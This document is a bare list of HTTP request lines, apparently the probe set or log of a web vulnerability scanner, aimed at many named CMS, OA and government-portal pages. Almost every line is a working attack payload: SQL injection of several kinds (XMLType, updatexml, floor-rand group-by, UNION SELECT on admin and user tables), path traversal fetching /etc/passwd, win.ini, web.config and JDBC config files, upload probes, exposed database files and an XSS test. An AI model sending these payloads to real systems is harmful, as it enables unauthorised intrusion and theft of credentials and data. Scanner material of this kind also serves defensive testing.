GET /deptProceedingDetailnew.do?itemtype=6&depNO=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122&approveName=&nowPage=3
GET /deptProceedingDetailnew.do?itemtype=12%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)&depNO=jx&approveName=&nowPage=3
GET /lm/front/reg.jsp?sysid=../reg.jsp%00.jpg
POST /web/SubmitLogin.do
GET /pic.aspx?classid=60)%20and%201=char(106)%20--
GET /frm/Count.aspx?id=29308%20AND%201=char(106)%20--&type=List
GET /engine/websigncontrol/readsigndata.jsp?id='%20union%20select%20concat(char(98,121),0x7c,char(99,102,114,101,101,114))%23
GET /index.php?c=MTA3==&op=../../../../../../../../../../etc/passwd%00.jpg
GET /SRP2003/UserManage/sysuser/modifypage.asp?id=1
GET /venus/AsVenusCA/desk/message/reply.asp
GET /Article/ArticleDetaileNews.aspx?type=2/**/and/**/1=char(106)--
POST /mx_form/order_save.php?form_id=5
HEAD /download.aspx?id=337&accessory=UploadFile/softdown/../../web.config
GET /cms/web/testsql.jsp
POST /web/zwdt/jjj.BjcxServlet
GET /login.php?LOGIN_USER_INCLUDE=/etc/passwd
POST /cms/client/uploadpic_html.jsp?toname=test.jsp&diskno=webscan
POST /cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=11&AddWebColumnID=22&filepath=/app/
GET /columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,md5(1122),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%23
GET /columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23
GET /webUser/webUser!list.action
GET /logincheck.php?UNAME=cfreer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
GET /module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
POST /admin/annual/delete_leave.post.php
GET /admin/workingsituation/check.php?uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29&project=459&type=task&name=bbb
GET /admin/workingsituation/download_excel.php?day=30&start=&end=&project=0&uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29%23&task=0
GET /admin/workingsituation/ajax.php?task_id=10039s&type=update_status&status=1s%27%20and%201%3D%28updatexml%281%2Cconcat%280x23%2C%28select%20md5%281122%29%29%2C0x23%29%2C1%29%29%23
GET /down.asp?cat_%69d=3%20and%201=2%20union%20select%201,'ijx',3,4,5,6,7,8,9,10,11,12,13%20from%20admin
POST /jdwm/cgi/getpwd.cgi
GET /public/jspdownload.jsp?FileFullPath=%5Cetc%5Cpasswd&FileName=passwd
GET /public/jspdownload.jsp?FileFullPath=c:%5Cwindows%5Cwin.ini&FileName=win.ini
GET /cms/web/jspdownload.jsp?FileUrl=c:%5Cwindows%5Cwin.ini
GET /cms/web/jspdownload.jsp?FileUrl=%5Cetc%5Cpasswd
GET /cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/reer.txt
GET /CorpInfo/CorpBaseInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/CorpAptitudeInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/PersonnelList.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/CorpAchievementList_SG.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /Credit/ShowCorpCredit.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/CorpDeBox.aspx?CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/CorpRewardsList.aspx?RewardsPunishment=1122&CorpCode=1122'%20and%201=char(106)%20--
GET /BM/Project/HistoryBindSegmentLeftList.aspx?CorpType=1122&CorpCode=1122'%20and%201=char(106)%20--
GET /CorpInfo/CorpSendLeftTree.aspx?JoinID=1122&CorpCode=1122'%20and%201=char(106)%20--
GET /forUI/Policy/showPolicy.aspx?ID=1122'%20and%201=char(106)%20--
GET /forUI/Person/EmplInfo.aspx?IDCard=1122'%20AND%201=CHAR(106)%20--%20
GET /forUI/Policy/DO.file?ID='%20or%201=char(106)%20--
GET /search/index/portalId/427?keyword=1'%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(114)%7C%7Cchr(101)%7C%7Cchr(106)%7C%7Cchr(101)%7C%7Cchr(114)%20FROM%20dual)))%7C%7C'
POST /Ajax_Handle/UploadAttachmentHandler.ashx
GET /ExtendForm/Down/Technological.aspx?id=1'%20and%201=char(106)%20--
POST /public/editext/up/soundsave.asp
POST /public/AspUpload/upload.asp?path=../../upload&processid=1
GET /xyEmployee_checkLoginForUser.do?userName=reer
GET /opac/ajax_get_file.php?filename=../admin/opacadminpwd.php
GET /zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php
GET /kc_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL#
GET /kecheng.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL#%20
GET /kecheng_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
GET /include/ad.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
GET /index.php?language_id=1%20and%20%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28select%28md5%281122%29%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23&is_protect=1&action=cccc
GET /picnews.asp?%69d=-1%20and%201=2%20union%20select%201,2,3,chr(106),5,6,7,8,9,10,11,12%20from%20admin
HEAD /opensoft.asp?%69d=10%20and%201=2
GET /phpsso_server/?m=phpsso&c=index&a=getapplist&appid=1&data=
POST /bmsltxDetail.do
POST /setAcceptance.do
POST /setAcceptance.do
GET /setMaterials.do?ITEM_ID=12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /intoSpDept.do?bmid=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
GET /nobom.php
GET /infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1'%20AND%209935=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)%7C%7CCHR(112)%7C%7CCHR(102)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(9935=9935)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(117)%7C%7CCHR(115)%7C%7CCHR(115)%7C%7CCHR(113))%20AND%20'keyi'='keyi&filters=
GET /lm/front/mailhotlist.jsp?editpagename=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&sysid=001
GET /lm/front/findpsw.jsp?editpagename=&groupid=&sysid=../../../../../../../../../../etc/passwd%00.jpg
GET /admin/Admin_Config.asp
GET /Project_SPInfoList.aspx?CategoryCode=1'%20and%201=char(106)%20--
GET /zxts_view.aspx?Id=4%20and%201=char(106)%20--&GBType=1
POST /FileUpload
GET /oa_server/App_Pages/App_page/user_update.aspx?userid=172
GET /api.php?c=api&f=phpok&id=_sublist&param[pid]=1%20union%20select%20concat(md5(1122),0x7c,pass),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20from%20qinggan_user%23&param[phpok]=1
GET /conformID.asp?Tid=jx'%20and%201=char(106)%20--
GET /DelAccessID.asp?AccessID=1'%20and%201=char(106)%20--&Datetime=
HEAD /KS_Data/KesionCMS6.mdb
HEAD /KS_Data/KesionCMS7.mdb
HEAD /KS_Data/KesionCMS8.mdb
HEAD /KS_Data/KesionCMS9.mdb
GET /conformID.asp?Tname=web'%20/**/and/**/1=char(106)--
POST /Asearch.asp
GET /linklist.asp?TlinkID=26'/**/and/**/1=char(106)--
GET /zyjs.asp?Txy=18&tzy=11'%20/**/and/**/1=char(106)%20--
GET /Biogenic.asp?Tbynf=21'%20and%201=char(106)%20--
GET /specialty.asp?Tbynf=1%20and%201%3Echar(106)%20--
GET /api.php?op=video_api&pc_hash=1&uid=1&snid=1122%22%20onmouseover=alert(42873)//&do_complete=1
GET /toall/desktop/dbform.asp?fn=&fntxt=&varid=8%20AND%201122%3DCONVERT%28INT%2C%28CHAR%2899%29%2bCHAR%28102%29%2bCHAR%28114%29%2bCHAR%28101%29%2bCHAR%28101%29%2bCHAR%28114%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28106%29%2bCHAR%28120%29%29%29
GET /index.php?c=ajax&a=member_login&template=../../ooxx.php
HEAD /addcontent/webEditor/upload/files/file_down.jsp?filename=/../../../../WEB-INF/web.xml
HEAD /addcontent/webEditor/upload/files/file_down.jsp?filename=/.xx/./.xx/./.xx/./.xx/./WEB-INxx/F/web.xml
GET /Tools/FileTool/Manage/Notepad.aspx?objfile=C:/windows/win.ini
GET /Tools/FileTool/Manage/Notepad.aspx?objfile=/etc/passwd
GET /workflow/flow_details.aspx?action=details&job_id=-12%20and%201=char(106)
POST /search.aspx
HEAD /servlet/fileOpenforms?filename=/index.jsp
HEAD /application/gzhd/bgxz/download.jsp?filename=/index.jsp
GET /livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1122'%20and%201=char(106)%20--
GET /truexxgk/app/nrglController/loadZwgk?zdjc=reer'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd&type=1
GET /NewsList.asp
GET /ActivityList.asp
GET /WidgetsHandler.ashx?widget=reer'%20where%201=1%20AND%20char(106)%3E0--
POST /common/guestbook.php
POST /common/help.php
GET /Comment/Comment.aspx?id=11'%20and%201=char(106)%20--
POST /wap/index.php?a=newslist
GET /index.php?_COOKIE[cfg][database]=mysql&_COOKIE[cfg][db_host]=localhost&_COOKIE[cfg][db_user]=webscan&_COOKIE[cfg][db_pass]=reer&_COOKIE[cfg][db_name]=db
GET /?question/tag/0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
GET /?question/search/tag:0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
POST /admin/uploadFile.action
GET /Adminiscentertrator/AdmIndex.asp
POST /Adminiscentertrator/AdmLinkInsert.asp
GET /corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /NewsList.asp
GET /bit-xxzs/xmlpzs/bsdetail.asp?id=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
GET /bit-xxzs/xmlpzs/ysxkdetail.asp?permitsaleno=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
GET /index.php?case=archive&act=orders&aid[aid%60%3D2%20and%200%20union%20select%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,md5(1122),36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_user%20where%20userid%3C2%20%20--%20%20a]=26
GET /zhanshi/equzhanshi.aspx?equid=-301'%20and%201=char(106)%20--
GET /prozhanshi/zice.aspx?id=-101'%20and%201=char(106)%20AND%20'at'='at
GET /prozhanshi/yuxi.aspx?id=-306'%20and%201=char(106)%20and%20'at'='at
GET /truexxgk/app/xxgkznController/firstXxgkznByZdjc/'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
GET /zhanshikebiao.aspx?centid=-301'%20and%201=char(106)%20--&date=&xyid=
GET /bit-xxzs/xmlpzs/builddetail.asp?buildid=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
POST /bit-xxzs/xmlpzs/webissue.asp
GET /article/file/cid/-306/?file=../../../../../../../../../../etc/passwd&method=in
GET /bit-xxzs/xmlpzs/fwsyqdetail.asp?certno=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
POST /bit-xxzs/xmlpzs/nowwebissue.asp
GET /bit-xxzs/xmlpzs/nowdetail.asp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
POST /bit-xxzs/xmlpzs/prewebissue.asp
POST /epstar/servlet/RaqFileServer?action=save&fileName=test.txt
GET /epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml
GET /www/item_seach.php?tempsql=and%201=2%20UNION%20SELECT%201,2,concat(0x7c,md5(1122),0x7c),4,5,6,7,8,9,10,11,12,13%23
HEAD /body/Function/download.asp?filepath=../download.asp&filename=download
GET /news/news_details.aspx?id=-1&coid=-5%20and%201=char(106)%20--
GET /install/step4.aspx
GET /admin/Role/Role_List.aspx
GET /sofpro/SltGecsMember?actiontype=WEB_EDIT_DETAIL&member_seq=-1
POST /admin/operupload.asp
POST /member/findAddressById.json
POST /member/zoneNm.json
GET /main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,0x6366726565723A696A78,3%20from%20H_System_User--
HEAD /i/ireportclient/fmgr/downloadhelpfile.jsp?file=/../conf/jdbc.conf
GET /api/uc.php?code=c2f4ZUxs8zoTQY250F1rAWrUX3HdH02DmJ%2B35SmPeYiZ4McfmrkhoXXy9iGUKw86jzY%2B%2F43CtUlnJtwQFcGhRIgJlqvJeZbHGdNSNyMC2VT9SjlxPpWveWUzynqY4%2FQnruPHVh%2FTxtjrrdBZhZXOqEDm1JBEB10PlawipFuTPtFKt08G2MSMWRRL5dKcXsmwIXKj4YJH%2BBD4cnwYwZVvqyjSTqMoB9nB6xYfwhedhJp%2B6Y%2BC5ZgHq0QnvYCmgGcHds1hKQDzp7vnEnyQSrFIZsfMTpbTIU8jrGOqBg
POST /search.php
GET /opac/index.jsp?page=../web-inf/web.xml
HEAD /datacenter/ueditor/downAttach.do?url=../../../../../../../../../../etc/passwd
GET /datacenter/ckfile.do?path=../../../../../../../../../../etc/passwd
GET /account.t?op=showAccountList
GET /oa_server/App_Pages/App_page/News_add.aspx
POST /truexxgk/app/YsqgkController/smallQuery?type=1
POST /truexxgk/app/YsqgkController/smallQuery?type=1
GET /store.php?Uid=1-db_mymps-my_member%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /detail.asp?id=-306/**/And/**/1=char(106)--&&t=
GET /content/index.php?cid=1%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
GET /content/detail.php?tid=1%20AND%20(SELECT%203047%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
GET /admincp.php?action=criterion&todo=list&id=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
GET /index.php?action=article&do=show&todo=content&a=282%20AND%20(SELECT%203853%20FROM(SELECT%20COUNT(*),CONCAT(0x6366726565723A,(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)),0x3A696A783A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
POST /UploadHandler.ashx
GET /index.php?action=teacher&teacher_id=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=infor
GET /class.php?action=news&do=39&dpid=68&m=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=station
POST /admincp.php?action=/../teacher/video&mid=18&todo=word&do=word_upload&action_word=FILE
POST /post.php?act=phpok&id=12
POST /weixin/index.php?m=index&c=index
POST /work_flow/formOptJSPUpload.jsp?flag=1
POST /work_flow/formStartJSPUpload.jsp?flag=1
POST /admin/mbgl/editmb_addok.jsp?ModelFile=/cesi.jsp
POST /public/editor/tpsc1.jsp?flag=sc
GET /outImg?imgPath=c:/boot.ini
GET /outImg?imgPath=/etc/passwd
POST /gsgl.asp?stype=
GET /common/codeMoreWidget.jsp?code=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
GET /piw/Member/UploadMemberAttach.jsp
GET /piw/School/SchoolTypeRegion.jsp?table=information_schema.schemata/**/where/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
GET /piw/Production/display/productSearch.jsp?keywords=1122'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/**/and/**/'1'='1
GET /piw/MessageBoard/articleIframe.jsp?DataId=1&Code=2%27and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
HEAD /cardload.jsp?filename=../etc/passwd&maininfo_id=-12
GET /systems/dept/dept_edit.aspx?CodeId=-4)%20and%201=char(106)--&id=1057
GET /show.asp?id=2621%20union%20SELECT%201,2,0x7700650062007300630061006E003A0066006F0075006E0064003A00760075006C00,4,5,6,7,8,9,10,11,12,13,14,15,16%20FROM%20ADMIN
GET /FileManages/FolderQxSet/Modify.aspx?type=2&id=-12/**/and/**/1=char(106)--
GET /Educational/Register.aspx?clientid=uName&uName=webscan'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7765627363616E3A666F756E643A76756C,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a);%23
GET /news/huiyidetails.aspx?action=serach&id=1%20and%201=char(106)
GET /OA/renshigongzi/xuexi.asp?tname=admin'%20UNION%20SELECT%201,2,0x66696E643A76756C,0x7765627363616E3A666F756E643A76756C,5,6,7%20from%20teachers--
GET /Consultant/zsklist.aspx?categoryNum=-004'%20and%201=char(106)%20--
GET /wywzlist.aspx?OUGuid=1')%20and%201=char(106)%20--%20
GET /answeredcaselist.aspx?OUName=1'%20and%201=char(106)%20--
POST /member.php?act=updateinfo
POST /site56/LmsOrder/trackOrder.jspx
GET /house/ProcManage/WebHouse/HousePic.aspx
GET /CommPage/imgbrowse.aspx?id=1&keycode=2'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
GET /CommPage/ShowImg.aspx?keycode=a&id=1&page=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
HEAD /_controls/upfile/UpFile_Main_Down.aspx?p_docname=Default.aspx&p_filename=../Default.aspx&p_open_type=_blank&random=
GET /FAQ/FaqLoading.aspx?id=-1122%20and%201=char(106)
POST /loginverify.asp
POST /newssearch.cfm
GET /mainpage/msglog.aspx?user=-1'%20and+1=char(106)--
GET /news_display.php?id=2%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
HEAD /down.aspx?Url=../web.config
HEAD /showpage/fjxz.jsp?fjlj=/showpage/fjxz.jsp
GET /sssweb/onlineVote/fvote.aspx?questionnaireID=-11'%20and%201=char(106)%20--
GET /opacOpenurl/getOpenUrlByBookId/-1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
GET /journal_guide?inital=T&marc_type=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)&subtag=&tag=
